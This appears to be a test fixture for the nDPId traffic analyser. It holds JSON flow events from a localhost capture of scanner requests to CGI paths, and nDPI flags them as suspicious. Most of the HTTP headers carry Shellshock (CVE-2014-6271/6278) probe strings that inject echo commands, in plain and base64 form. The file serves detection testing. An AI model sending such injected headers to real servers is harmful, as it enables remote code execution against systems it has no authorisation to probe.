-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1576420277428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277428,"pkt":"AAAAAAAAAAAAAAAACABFAAEJsHVAAEAGi3d\/AAABfwAAAcVEH5DgV4i\/xF\/y64AYAED+\/QAAAQEICp1m\/dydZv3cR0VUIC9sb2dpbi5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} -01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":1,"flow_last_seen":1576420277429,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277429,"pkt":"AAAAAAAAAAAAAAAACABFAAEMTIBAAEAG72l\/AAABfwAAAcVGH5AiwXS0u+SpZoAYAED\/AAAAAQEICp1m\/d2dZv3dR0VUIC9wYXRodGVzdC5wbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pathtest.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7440000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":1,"flow_last_seen":1576420277431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1576420277431,"pkt":"AAAAAAAAAAAAAAAACABFAAEE5XFAAEAGVoB\/AAABfwAAAcVIH5CqQt2jzObFZYAYAED++AAAAQEICp1m\/d+dZv3eR0VUIC9waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7440000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":1,"flow_last_seen":1576420277432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277432,"pkt":"AAAAAAAAAAAAAAAACABFAAEFeJtAAEAGw1V\/AAABfwAAAcVKH5AUwUBY1pIiyIAYAED++QAAAQEICp1m\/eCdZv3gR0VUIC9waHA0IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php4","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":1,"flow_last_seen":1576420277433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277433,"pkt":"AAAAAAAAAAAAAAAACABFAAEFSMVAAEAG8yt\/AAABfwAAAcVMH5DeS3AOoHbKrYAYAED++QAAAQEICp1m\/eGdZv3hR0VUIC9waHA1IEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php5","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":1,"flow_last_seen":1576420277434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277434,"pkt":"AAAAAAAAAAAAAAAACABFAAEI0WFAAEAGaox\/AAABfwAAAcVOH5BRy+mS7UbDZYAYAED+\/AAAAQEICp1m\/eKdZv3iR0VUIC9waHAtY2dpIEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1576420277436,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277436,"pkt":"AAAAAAAAAAAAAAAACABFAAEIqnVAAEAGkXh\/AAABfwAAAcVQH5Bll5K9uysWxoAYAED+\/AAAAQEICp1m\/eOdZv3jR0VUIC9waHAuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1576420277437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277437,"pkt":"AAAAAAAAAAAAAAAACABFAAEJlAhAAEAGp+R\/AAABfwAAAcVSH5AUHqzKqBdRL4AYAED+\/QAAAQEICp1m\/eWdZv3lR0VUIC9waHAuZmNnaSBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.fcgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":1,"flow_last_seen":1576420277438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277438,"pkt":"AAAAAAAAAAAAAAAACABFAAEJhwhAAEAGtOR\/AAABfwAAAcVUH5Cc4b\/Kjk5kuIAYAED+\/QAAAQEICp1m\/eadZv3mR0VUIC9wcmludGVudiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/printenv","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":1,"flow_last_seen":1576420277439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277439,"pkt":"AAAAAAAAAAAAAAAACABFAAETyIlAAEAGc1l\/AAABfwAAAcVWH5DyzvBYc36tz4AYAED\/BwAAAQEICp1m\/eedZv3nR0VUIC9yZXN0b3JlX2NvbmZpZy5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/restore_config.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 